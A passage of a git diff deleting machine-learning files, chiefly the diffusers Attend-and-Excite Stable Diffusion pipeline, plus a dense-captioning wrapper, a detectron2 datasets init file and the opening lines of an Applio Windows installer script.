"feature_extractor"] - - def __init__( - self, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: KarrasDiffusionSchedulers, - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPImageProcessor, - requires_safety_checker: bool = True, - ): - super().__init__() - - if safety_checker is None and requires_safety_checker: - logger.warning( - f"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure" - " that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered" - " results in services or applications open to the public. Both the diffusers team and Hugging Face" - " strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling" - " it only for use-cases that involve analyzing network behavior or auditing its results. For more" - " information, please have a look at https://github.com/huggingface/diffusers/pull/254 ." - ) - - if safety_checker is not None and feature_extractor is None: - raise ValueError( - "Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety" - " checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead." - ) - - self.register_modules( - vae=vae, - text_encoder=text_encoder, - tokenizer=tokenizer, - unet=unet, - scheduler=scheduler, - safety_checker=safety_checker, - feature_extractor=feature_extractor, - ) - self.vae_scale_factor = 2 ** (len(self.vae.config.block_out_channels) - 1) - self.image_processor = VaeImageProcessor(vae_scale_factor=self.vae_scale_factor) - self.register_to_config(requires_safety_checker=requires_safety_checker) - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.enable_vae_slicing - def enable_vae_slicing(self): - r""" - Enable sliced VAE decoding. When this option is enabled, the VAE will split the input tensor in slices to - compute decoding in several steps. This is useful to save some memory and allow larger batch sizes. - """ - self.vae.enable_slicing() - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.disable_vae_slicing - def disable_vae_slicing(self): - r""" - Disable sliced VAE decoding. If `enable_vae_slicing` was previously enabled, this method will go back to - computing decoding in one step. - """ - self.vae.disable_slicing() - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline._encode_prompt - def _encode_prompt( - self, - prompt, - device, - num_images_per_prompt, - do_classifier_free_guidance, - negative_prompt=None, - prompt_embeds: Optional[torch.FloatTensor] = None, - negative_prompt_embeds: Optional[torch.FloatTensor] = None, - lora_scale: Optional[float] = None, - ): - r""" - Encodes the prompt into text encoder hidden states. - - Args: - prompt (`str` or `List[str]`, *optional*): - prompt to be encoded - device: (`torch.device`): - torch device - num_images_per_prompt (`int`): - number of images that should be generated per prompt - do_classifier_free_guidance (`bool`): - whether to use classifier free guidance or not - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts not to guide the image generation. If not defined, one has to pass - `negative_prompt_embeds` instead. Ignored when not using guidance (i.e., ignored if `guidance_scale` is - less than `1`). - prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt weighting. If not - provided, text embeddings will be generated from `prompt` input argument. - negative_prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated negative text embeddings. Can be used to easily tweak text inputs, *e.g.* prompt - weighting. If not provided, negative_prompt_embeds will be generated from `negative_prompt` input - argument. - lora_scale (`float`, *optional*): - A lora scale that will be applied to all LoRA layers of the text encoder if LoRA layers are loaded. - """ - # set lora scale so that monkey patched LoRA - # function of text encoder can correctly access it - if lora_scale is not None and isinstance(self, LoraLoaderMixin): - self._lora_scale = lora_scale - - if prompt is not None and isinstance(prompt, str): - batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - batch_size = len(prompt) - else: - batch_size = prompt_embeds.shape[0] - - if prompt_embeds is None: - # textual inversion: procecss multi-vector tokens if necessary - if isinstance(self, TextualInversionLoaderMixin): - prompt = self.maybe_convert_prompt(prompt, self.tokenizer) - - text_inputs = self.tokenizer( - prompt, - padding="max_length", - max_length=self.tokenizer.model_max_length, - truncation=True, - return_tensors="pt", - ) - text_input_ids = text_inputs.input_ids - untruncated_ids = self.tokenizer(prompt, padding="longest", return_tensors="pt").input_ids - - if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal( - text_input_ids, untruncated_ids - ): - removed_text = self.tokenizer.batch_decode( - untruncated_ids[:, self.tokenizer.model_max_length - 1 : -1] - ) - logger.warning( - "The following part of your input was truncated because CLIP can only handle sequences up to" - f" {self.tokenizer.model_max_length} tokens: {removed_text}" - ) - - if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask: - attention_mask = text_inputs.attention_mask.to(device) - else: - attention_mask = None - - prompt_embeds = self.text_encoder( - text_input_ids.to(device), - attention_mask=attention_mask, - ) - prompt_embeds = prompt_embeds[0] - - prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device) - - bs_embed, seq_len, _ = prompt_embeds.shape - # duplicate text embeddings for each generation per prompt, using mps friendly method - prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1) - prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1) - - # get unconditional embeddings for classifier free guidance - if do_classifier_free_guidance and negative_prompt_embeds is None: - uncond_tokens: List[str] - if negative_prompt is None: - uncond_tokens = [""] * batch_size - elif prompt is not None and type(prompt) is not type(negative_prompt): - raise TypeError( - f"`negative_prompt` should be the same type to `prompt`, but got {type(negative_prompt)} !=" - f" {type(prompt)}." - ) - elif isinstance(negative_prompt, str): - uncond_tokens = [negative_prompt] - elif batch_size != len(negative_prompt): - raise ValueError( - f"`negative_prompt`: {negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:" - f" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches" - " the batch size of `prompt`." - ) - else: - uncond_tokens = negative_prompt - - # textual inversion: procecss multi-vector tokens if necessary - if isinstance(self, TextualInversionLoaderMixin): - uncond_tokens = self.maybe_convert_prompt(uncond_tokens, self.tokenizer) - - max_length = prompt_embeds.shape[1] - uncond_input = self.tokenizer( - uncond_tokens, - padding="max_length", - max_length=max_length, - truncation=True, - return_tensors="pt", - ) - - if hasattr(self.text_encoder.config, "use_attention_mask") and self.text_encoder.config.use_attention_mask: - attention_mask = uncond_input.attention_mask.to(device) - else: - attention_mask = None - - negative_prompt_embeds = self.text_encoder( - uncond_input.input_ids.to(device), - attention_mask=attention_mask, - ) - negative_prompt_embeds = negative_prompt_embeds[0] - - if do_classifier_free_guidance: - # duplicate unconditional embeddings for each generation per prompt, using mps friendly method - seq_len = negative_prompt_embeds.shape[1] - - negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device) - - negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1) - negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len, -1) - - # For classifier free guidance, we need to do two forward passes. - # Here we concatenate the unconditional and text embeddings into a single batch - # to avoid doing two forward passes - prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds]) - - return prompt_embeds - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.run_safety_checker - def run_safety_checker(self, image, device, dtype): - if self.safety_checker is None: - has_nsfw_concept = None - else: - if torch.is_tensor(image): - feature_extractor_input = self.image_processor.postprocess(image, output_type="pil") - else: - feature_extractor_input = self.image_processor.numpy_to_pil(image) - safety_checker_input = self.feature_extractor(feature_extractor_input, return_tensors="pt").to(device) - image, has_nsfw_concept = self.safety_checker( - images=image, clip_input=safety_checker_input.pixel_values.to(dtype) - ) - return image, has_nsfw_concept - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.decode_latents - def decode_latents(self, latents): - warnings.warn( - "The decode_latents method is deprecated and will be removed in a future version. Please" - " use VaeImageProcessor instead", - FutureWarning, - ) - latents = 1 / self.vae.config.scaling_factor * latents - image = self.vae.decode(latents, return_dict=False)[0] - image = (image / 2 + 0.5).clamp(0, 1) - # we always cast to float32 as this does not cause significant overhead and is compatible with bfloat16 - image = image.cpu().permute(0, 2, 3, 1).float().numpy() - return image - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_extra_step_kwargs - def prepare_extra_step_kwargs(self, generator, eta): - # prepare extra kwargs for the scheduler step, since not all schedulers have the same signature - # eta (η) is only used with the DDIMScheduler, it will be ignored for other schedulers. - # eta corresponds to η in DDIM paper: https://arxiv.org/abs/2010.02502 - # and should be between [0, 1] - - accepts_eta = "eta" in set(inspect.signature(self.scheduler.step).parameters.keys()) - extra_step_kwargs = {} - if accepts_eta: - extra_step_kwargs["eta"] = eta - - # check if the scheduler accepts generator - accepts_generator = "generator" in set(inspect.signature(self.scheduler.step).parameters.keys()) - if accepts_generator: - extra_step_kwargs["generator"] = generator - return extra_step_kwargs - - def check_inputs( - self, - prompt, - indices, - height, - width, - callback_steps, - negative_prompt=None, - prompt_embeds=None, - negative_prompt_embeds=None, - ): - if height % 8 != 0 or width % 8 != 0: - raise ValueError(f"`height` and `width` have to be divisible by 8 but are {height} and {width}.") - - if (callback_steps is None) or ( - callback_steps is not None and (not isinstance(callback_steps, int) or callback_steps <= 0) - ): - raise ValueError( - f"`callback_steps` has to be a positive integer but is {callback_steps} of type" - f" {type(callback_steps)}." - ) - - if prompt is not None and prompt_embeds is not None: - raise ValueError( - f"Cannot forward both `prompt`: {prompt} and `prompt_embeds`: {prompt_embeds}. Please make sure to" - " only forward one of the two." - ) - elif prompt is None and prompt_embeds is None: - raise ValueError( - "Provide either `prompt` or `prompt_embeds`. Cannot leave both `prompt` and `prompt_embeds` undefined." - ) - elif prompt is not None and (not isinstance(prompt, str) and not isinstance(prompt, list)): - raise ValueError(f"`prompt` has to be of type `str` or `list` but is {type(prompt)}") - - if negative_prompt is not None and negative_prompt_embeds is not None: - raise ValueError( - f"Cannot forward both `negative_prompt`: {negative_prompt} and `negative_prompt_embeds`:" - f" {negative_prompt_embeds}. Please make sure to only forward one of the two." - ) - - if prompt_embeds is not None and negative_prompt_embeds is not None: - if prompt_embeds.shape != negative_prompt_embeds.shape: - raise ValueError( - "`prompt_embeds` and `negative_prompt_embeds` must have the same shape when passed directly, but" - f" got: `prompt_embeds` {prompt_embeds.shape} != `negative_prompt_embeds`" - f" {negative_prompt_embeds.shape}." - ) - - indices_is_list_ints = isinstance(indices, list) and isinstance(indices[0], int) - indices_is_list_list_ints = ( - isinstance(indices, list) and isinstance(indices[0], list) and isinstance(indices[0][0], int) - ) - - if not indices_is_list_ints and not indices_is_list_list_ints: - raise TypeError("`indices` must be a list of ints or a list of a list of ints") - - if indices_is_list_ints: - indices_batch_size = 1 - elif indices_is_list_list_ints: - indices_batch_size = len(indices) - - if prompt is not None and isinstance(prompt, str): - prompt_batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - prompt_batch_size = len(prompt) - elif prompt_embeds is not None: - prompt_batch_size = prompt_embeds.shape[0] - - if indices_batch_size != prompt_batch_size: - raise ValueError( - f"indices batch size must be same as prompt batch size. indices batch size: {indices_batch_size}, prompt batch size: {prompt_batch_size}" - ) - - # Copied from diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion.StableDiffusionPipeline.prepare_latents - def prepare_latents(self, batch_size, num_channels_latents, height, width, dtype, device, generator, latents=None): - shape = (batch_size, num_channels_latents, height // self.vae_scale_factor, width // self.vae_scale_factor) - if isinstance(generator, list) and len(generator) != batch_size: - raise ValueError( - f"You have passed a list of generators of length {len(generator)}, but requested an effective batch" - f" size of {batch_size}. Make sure the batch size matches the length of the generators." - ) - - if latents is None: - latents = randn_tensor(shape, generator=generator, device=device, dtype=dtype) - else: - latents = latents.to(device) - - # scale the initial noise by the standard deviation required by the scheduler - latents = latents * self.scheduler.init_noise_sigma - return latents - - @staticmethod - def _compute_max_attention_per_index( - attention_maps: torch.Tensor, - indices: List[int], - ) -> List[torch.Tensor]: - """Computes the maximum attention value for each of the tokens we wish to alter.""" - attention_for_text = attention_maps[:, :, 1:-1] - attention_for_text *= 100 - attention_for_text = torch.nn.functional.softmax(attention_for_text, dim=-1) - - # Shift indices since we removed the first token - indices = [index - 1 for index in indices] - - # Extract the maximum values - max_indices_list = [] - for i in indices: - image = attention_for_text[:, :, i] - smoothing = GaussianSmoothing().to(attention_maps.device) - input = F.pad(image.unsqueeze(0).unsqueeze(0), (1, 1, 1, 1), mode="reflect") - image = smoothing(input).squeeze(0).squeeze(0) - max_indices_list.append(image.max()) - return max_indices_list - - def _aggregate_and_get_max_attention_per_token( - self, - indices: List[int], - ): - """Aggregates the attention for each token and computes the max activation value for each token to alter.""" - attention_maps = self.attention_store.aggregate_attention( - from_where=("up", "down", "mid"), - ) - max_attention_per_index = self._compute_max_attention_per_index( - attention_maps=attention_maps, - indices=indices, - ) - return max_attention_per_index - - @staticmethod - def _compute_loss(max_attention_per_index: List[torch.Tensor]) -> torch.Tensor: - """Computes the attend-and-excite loss using the maximum attention value for each token.""" - losses = [max(0, 1.0 - curr_max) for curr_max in max_attention_per_index] - loss = max(losses) - return loss - - @staticmethod - def _update_latent(latents: torch.Tensor, loss: torch.Tensor, step_size: float) -> torch.Tensor: - """Update the latent according to the computed loss.""" - grad_cond = torch.autograd.grad(loss.requires_grad_(True), [latents], retain_graph=True)[0] - latents = latents - step_size * grad_cond - return latents - - def _perform_iterative_refinement_step( - self, - latents: torch.Tensor, - indices: List[int], - loss: torch.Tensor, - threshold: float, - text_embeddings: torch.Tensor, - step_size: float, - t: int, - max_refinement_steps: int = 20, - ): - """ - Performs the iterative latent refinement introduced in the paper. Here, we continuously update the latent code - according to our loss objective until the given threshold is reached for all tokens. - """ - iteration = 0 - target_loss = max(0, 1.0 - threshold) - while loss > target_loss: - iteration += 1 - - latents = latents.clone().detach().requires_grad_(True) - self.unet(latents, t, encoder_hidden_states=text_embeddings).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=indices, - ) - - loss = self._compute_loss(max_attention_per_index) - - if loss != 0: - latents = self._update_latent(latents, loss, step_size) - - logger.info(f"\t Try {iteration}. loss: {loss}") - - if iteration >= max_refinement_steps: - logger.info(f"\t Exceeded max number of iterations ({max_refinement_steps})! ") - break - - # Run one more time but don't compute gradients and update the latents. - # We just need to compute the new loss - the grad update will occur below - latents = latents.clone().detach().requires_grad_(True) - _ = self.unet(latents, t, encoder_hidden_states=text_embeddings).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=indices, - ) - loss = self._compute_loss(max_attention_per_index) - logger.info(f"\t Finished with loss of: {loss}") - return loss, latents, max_attention_per_index - - def register_attention_control(self): - attn_procs = {} - cross_att_count = 0 - for name in self.unet.attn_processors.keys(): - if name.startswith("mid_block"): - place_in_unet = "mid" - elif name.startswith("up_blocks"): - place_in_unet = "up" - elif name.startswith("down_blocks"): - place_in_unet = "down" - else: - continue - - cross_att_count += 1 - attn_procs[name] = AttendExciteAttnProcessor(attnstore=self.attention_store, place_in_unet=place_in_unet) - - self.unet.set_attn_processor(attn_procs) - self.attention_store.num_att_layers = cross_att_count - - def get_indices(self, prompt: str) -> Dict[str, int]: - """Utility function to list the indices of the tokens you wish to alte""" - ids = self.tokenizer(prompt).input_ids - indices = {i: tok for tok, i in zip(self.tokenizer.convert_ids_to_tokens(ids), range(len(ids)))} - return indices - - @torch.no_grad() - @replace_example_docstring(EXAMPLE_DOC_STRING) - def __call__( - self, - prompt: Union[str, List[str]], - token_indices: Union[List[int], List[List[int]]], - height: Optional[int] = None, - width: Optional[int] = None, - num_inference_steps: int = 50, - guidance_scale: float = 7.5, - negative_prompt: Optional[Union[str, List[str]]] = None, - num_images_per_prompt: int = 1, - eta: float = 0.0, - generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None, - latents: Optional[torch.FloatTensor] = None, - prompt_embeds: Optional[torch.FloatTensor] = None, - negative_prompt_embeds: Optional[torch.FloatTensor] = None, - output_type: Optional[str] = "pil", - return_dict: bool = True, - callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None, - callback_steps: int = 1, - cross_attention_kwargs: Optional[Dict[str, Any]] = None, - max_iter_to_alter: int = 25, - thresholds: dict = {0: 0.05, 10: 0.5, 20: 0.8}, - scale_factor: int = 20, - attn_res: Optional[Tuple[int]] = (16, 16), - ): - r""" - The call function to the pipeline for generation. - - Args: - prompt (`str` or `List[str]`, *optional*): - The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`. - token_indices (`List[int]`): - The token indices to alter with attend-and-excite. - height (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`): - The height in pixels of the generated image. - width (`int`, *optional*, defaults to `self.unet.config.sample_size * self.vae_scale_factor`): - The width in pixels of the generated image. - num_inference_steps (`int`, *optional*, defaults to 50): - The number of denoising steps. More denoising steps usually lead to a higher quality image at the - expense of slower inference. - guidance_scale (`float`, *optional*, defaults to 7.5): - A higher guidance scale value encourages the model to generate images closely linked to the text - `prompt` at the expense of lower image quality. Guidance scale is enabled when `guidance_scale > 1`. - negative_prompt (`str` or `List[str]`, *optional*): - The prompt or prompts to guide what to not include in image generation. If not defined, you need to - pass `negative_prompt_embeds` instead. Ignored when not using guidance (`guidance_scale < 1`). - num_images_per_prompt (`int`, *optional*, defaults to 1): - The number of images to generate per prompt. - eta (`float`, *optional*, defaults to 0.0): - Corresponds to parameter eta (η) from the [DDIM](https://arxiv.org/abs/2010.02502) paper. Only applies - to the [`~schedulers.DDIMScheduler`], and is ignored in other schedulers. - generator (`torch.Generator` or `List[torch.Generator]`, *optional*): - A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make - generation deterministic. - latents (`torch.FloatTensor`, *optional*): - Pre-generated noisy latents sampled from a Gaussian distribution, to be used as inputs for image - generation. Can be used to tweak the same generation with different prompts. If not provided, a latents - tensor is generated by sampling using the supplied random `generator`. - prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated text embeddings. Can be used to easily tweak text inputs (prompt weighting). If not - provided, text embeddings are generated from the `prompt` input argument. - negative_prompt_embeds (`torch.FloatTensor`, *optional*): - Pre-generated negative text embeddings. Can be used to easily tweak text inputs (prompt weighting). If - not provided, `negative_prompt_embeds` are generated from the `negative_prompt` input argument. - output_type (`str`, *optional*, defaults to `"pil"`): - The output format of the generated image. Choose between `PIL.Image` or `np.array`. - return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] instead of a - plain tuple. - callback (`Callable`, *optional*): - A function that calls every `callback_steps` steps during inference. The function is called with the - following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`. - callback_steps (`int`, *optional*, defaults to 1): - The frequency at which the `callback` function is called. If not specified, the callback is called at - every step. - cross_attention_kwargs (`dict`, *optional*): - A kwargs dictionary that if specified is passed along to the [`AttentionProcessor`] as defined in - [`self.processor`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/models/cross_attention.py). - max_iter_to_alter (`int`, *optional*, defaults to `25`): - Number of denoising steps to apply attend-and-excite. The `max_iter_to_alter` denoising steps are when - attend-and-excite is applied. For example, if `max_iter_to_alter` is `25` and there are a total of `30` - denoising steps, the first `25` denoising steps applies attend-and-excite and the last `5` will not. - thresholds (`dict`, *optional*, defaults to `{0: 0.05, 10: 0.5, 20: 0.8}`): - Dictionary defining the iterations and desired thresholds to apply iterative latent refinement in. - scale_factor (`int`, *optional*, default to 20): - Scale factor to control the step size of each attend-and-excite update. - attn_res (`tuple`, *optional*, default computed from width and height): - The 2D resolution of the semantic attention map. - - Examples: - - Returns: - [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] or `tuple`: - If `return_dict` is `True`, [`~pipelines.stable_diffusion.StableDiffusionPipelineOutput`] is returned, - otherwise a `tuple` is returned where the first element is a list with the generated images and the - second element is a list of `bool`s indicating whether the corresponding generated image contains - "not-safe-for-work" (nsfw) content. - """ - - # 0. Default height and width to unet - height = height or self.unet.config.sample_size * self.vae_scale_factor - width = width or self.unet.config.sample_size * self.vae_scale_factor - - # 1. Check inputs. Raise error if not correct - self.check_inputs( - prompt, - token_indices, - height, - width, - callback_steps, - negative_prompt, - prompt_embeds, - negative_prompt_embeds, - ) - - # 2. Define call parameters - if prompt is not None and isinstance(prompt, str): - batch_size = 1 - elif prompt is not None and isinstance(prompt, list): - batch_size = len(prompt) - else: - batch_size = prompt_embeds.shape[0] - - device = self._execution_device - # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2) - # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1` - # corresponds to doing no classifier free guidance. - do_classifier_free_guidance = guidance_scale > 1.0 - - # 3. Encode input prompt - prompt_embeds = self._encode_prompt( - prompt, - device, - num_images_per_prompt, - do_classifier_free_guidance, - negative_prompt, - prompt_embeds=prompt_embeds, - negative_prompt_embeds=negative_prompt_embeds, - ) - - # 4. Prepare timesteps - self.scheduler.set_timesteps(num_inference_steps, device=device) - timesteps = self.scheduler.timesteps - - # 5. Prepare latent variables - num_channels_latents = self.unet.config.in_channels - latents = self.prepare_latents( - batch_size * num_images_per_prompt, - num_channels_latents, - height, - width, - prompt_embeds.dtype, - device, - generator, - latents, - ) - - # 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline - extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta) - - if attn_res is None: - attn_res = int(np.ceil(width / 32)), int(np.ceil(height / 32)) - self.attention_store = AttentionStore(attn_res) - self.register_attention_control() - - # default config for step size from original repo - scale_range = np.linspace(1.0, 0.5, len(self.scheduler.timesteps)) - step_size = scale_factor * np.sqrt(scale_range) - - text_embeddings = ( - prompt_embeds[batch_size * num_images_per_prompt :] if do_classifier_free_guidance else prompt_embeds - ) - - if isinstance(token_indices[0], int): - token_indices = [token_indices] - - indices = [] - - for ind in token_indices: - indices = indices + [ind] * num_images_per_prompt - - # 7. Denoising loop - num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order - with self.progress_bar(total=num_inference_steps) as progress_bar: - for i, t in enumerate(timesteps): - # Attend and excite process - with torch.enable_grad(): - latents = latents.clone().detach().requires_grad_(True) - updated_latents = [] - for latent, index, text_embedding in zip(latents, indices, text_embeddings): - # Forward pass of denoising with text conditioning - latent = latent.unsqueeze(0) - text_embedding = text_embedding.unsqueeze(0) - - self.unet( - latent, - t, - encoder_hidden_states=text_embedding, - cross_attention_kwargs=cross_attention_kwargs, - ).sample - self.unet.zero_grad() - - # Get max activation value for each subject token - max_attention_per_index = self._aggregate_and_get_max_attention_per_token( - indices=index, - ) - - loss = self._compute_loss(max_attention_per_index=max_attention_per_index) - - # If this is an iterative refinement step, verify we have reached the desired threshold for all - if i in thresholds.keys() and loss > 1.0 - thresholds[i]: - loss, latent, max_attention_per_index = self._perform_iterative_refinement_step( - latents=latent, - indices=index, - loss=loss, - threshold=thresholds[i], - text_embeddings=text_embedding, - step_size=step_size[i], - t=t, - ) - - # Perform gradient update - if i < max_iter_to_alter: - if loss != 0: - latent = self._update_latent( - latents=latent, - loss=loss, - step_size=step_size[i], - ) - logger.info(f"Iteration {i} | Loss: {loss:0.4f}") - - updated_latents.append(latent) - - latents = torch.cat(updated_latents, dim=0) - - # expand the latents if we are doing classifier free guidance - latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents - latent_model_input = self.scheduler.scale_model_input(latent_model_input, t) - - # predict the noise residual - noise_pred = self.unet( - latent_model_input, - t, - encoder_hidden_states=prompt_embeds, - cross_attention_kwargs=cross_attention_kwargs, - ).sample - - # perform guidance - if do_classifier_free_guidance: - noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) - noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) - - # compute the previous noisy sample x_t -> x_t-1 - latents = self.scheduler.step(noise_pred, t, latents, **extra_step_kwargs).prev_sample - - # call the callback, if provided - if i == len(timesteps) - 1 or ((i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0): - progress_bar.update() - if callback is not None and i % callback_steps == 0: - callback(i, t, latents) - - # 8. Post-processing - if not output_type == "latent": - image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0] - image, has_nsfw_concept = self.run_safety_checker(image, device, prompt_embeds.dtype) - else: - image = latents - has_nsfw_concept = None - - if has_nsfw_concept is None: - do_denormalize = [True] * image.shape[0] - else: - do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept] - - image = self.image_processor.postprocess(image, output_type=output_type, do_denormalize=do_denormalize) - - if not return_dict: - return (image, has_nsfw_concept) - - return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept) - - -class GaussianSmoothing(torch.nn.Module): - """ - Arguments: - Apply gaussian smoothing on a 1d, 2d or 3d tensor. Filtering is performed seperately for each channel in the input - using a depthwise convolution. - channels (int, sequence): Number of channels of the input tensors. Output will - have this number of channels as well. - kernel_size (int, sequence): Size of the gaussian kernel. sigma (float, sequence): Standard deviation of the - gaussian kernel. dim (int, optional): The number of dimensions of the data. - Default value is 2 (spatial). - """ - - # channels=1, kernel_size=kernel_size, sigma=sigma, dim=2 - def __init__( - self, - channels: int = 1, - kernel_size: int = 3, - sigma: float = 0.5, - dim: int = 2, - ): - super().__init__() - - if isinstance(kernel_size, int): - kernel_size = [kernel_size] * dim - if isinstance(sigma, float): - sigma = [sigma] * dim - - # The gaussian kernel is the product of the - # gaussian function of each dimension. - kernel = 1 - meshgrids = torch.meshgrid([torch.arange(size, dtype=torch.float32) for size in kernel_size]) - for size, std, mgrid in zip(kernel_size, sigma, meshgrids): - mean = (size - 1) / 2 - kernel *= 1 / (std * math.sqrt(2 * math.pi)) * torch.exp(-(((mgrid - mean) / (2 * std)) ** 2)) - - # Make sure sum of values in gaussian kernel equals 1. - kernel = kernel / torch.sum(kernel) - - # Reshape to depthwise convolutional weight - kernel = kernel.view(1, 1, *kernel.size()) - kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1)) - - self.register_buffer("weight", kernel) - self.groups = channels - - if dim == 1: - self.conv = F.conv1d - elif dim == 2: - self.conv = F.conv2d - elif dim == 3: - self.conv = F.conv3d - else: - raise RuntimeError("Only 1, 2 and 3 dimensions are supported. Received {}.".format(dim)) - - def forward(self, input): - """ - Arguments: - Apply gaussian filter to input. - input (torch.Tensor): Input to apply gaussian filter on. - Returns: - filtered (torch.Tensor): Filtered output. - """ - return self.conv(input, weight=self.weight.to(input.dtype), groups=self.groups) diff --git a/spaces/Awiny/Image2Paragraph/models/grit_model.py b/spaces/Awiny/Image2Paragraph/models/grit_model.py deleted file mode 100644 index a0a55a56277c0ad8c4829bb5e522871f4c211e9b..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_model.py +++ /dev/null @@ -1,27 +0,0 @@ -import os -from models.grit_src.image_dense_captions import image_caption_api - -class DenseCaptioning(): - def __init__(self, device): - self.device = device - - - def initialize_model(self): - pass - - def image_dense_caption_debug(self, image_src): - dense_caption = """ - 1. the broccoli is green, [0, 0, 333, 325]; - 2. a piece of broccoli, [0, 147, 143, 324]; - 3. silver fork on plate, [4, 547, 252, 612]; - """ - return dense_caption - - def image_dense_caption(self, image_src): - dense_caption = image_caption_api(image_src, self.device) - print('\033[1;35m' + '*' * 100 + '\033[0m') - print("Step2, Dense Caption:\n") - print(dense_caption) - print('\033[1;35m' + '*' * 100 + '\033[0m') - return dense_caption - \ No newline at end of file diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py deleted file mode 100644 index a44bedc15e5f0e762fc4d77efd6f1b07c6ff77d0..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from .coco import load_coco_json, load_sem_seg, register_coco_instances, convert_to_coco_json -from .coco_panoptic import register_coco_panoptic, register_coco_panoptic_separated -from .lvis import load_lvis_json, register_lvis_instances, get_lvis_instances_meta -from .pascal_voc import load_voc_instances, register_pascal_voc -from . import builtin as _builtin # ensure the builtin datasets are registered - - -__all__ = [k for k in globals().keys() if not k.startswith("_")] diff --git a/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat b/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat deleted file mode 100644 index 91b8acfc0c69a356fd5b1d77650b2cd728b1072b..0000000000000000000000000000000000000000 --- a/spaces/Bart92/RVC_HF/go-applio-manager-recode.bat +++ /dev/null @@ -1,322 +0,0 @@ -@echo off -title Applio Installer - -::: _ _ _____ _ -::: /\ | (_) | __ \ | | -::: / \ _ __ _ __ | |_ ___ | |__) |___ ___ ___ __| | ___ -::: / /\ \ | '_ \| '_ \| | |/ _ \ | _ // _ \/ __/ _ \ / _` |/ _ \ -::: / ____ \| |_) | |_) | | | (_) | | | \ \ __/ (_| (_) | (_| | __/ -::: /_/ \_\ .__/| .__/|_|_|\___/ |_| \_\___|\___\___/ \__,_|\___| -::: | | | | -::: |_| |_| -::: -::: - -setlocal -set "branch=applio-recode" -set "runtime=runtime-recode" -set "repoUrl=https://github.com/IAHispano/Applio-RVC-Fork/archive/refs/heads/%branch%.zip" -set "fixesFolder=fixes" -set "localFixesPy=local_fixes.py" -set "principal=%cd%" -set "URL_BASE=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main" -set "URL_EXTRA=https://huggingface.co/IAHispano/applio/resolve/main" - 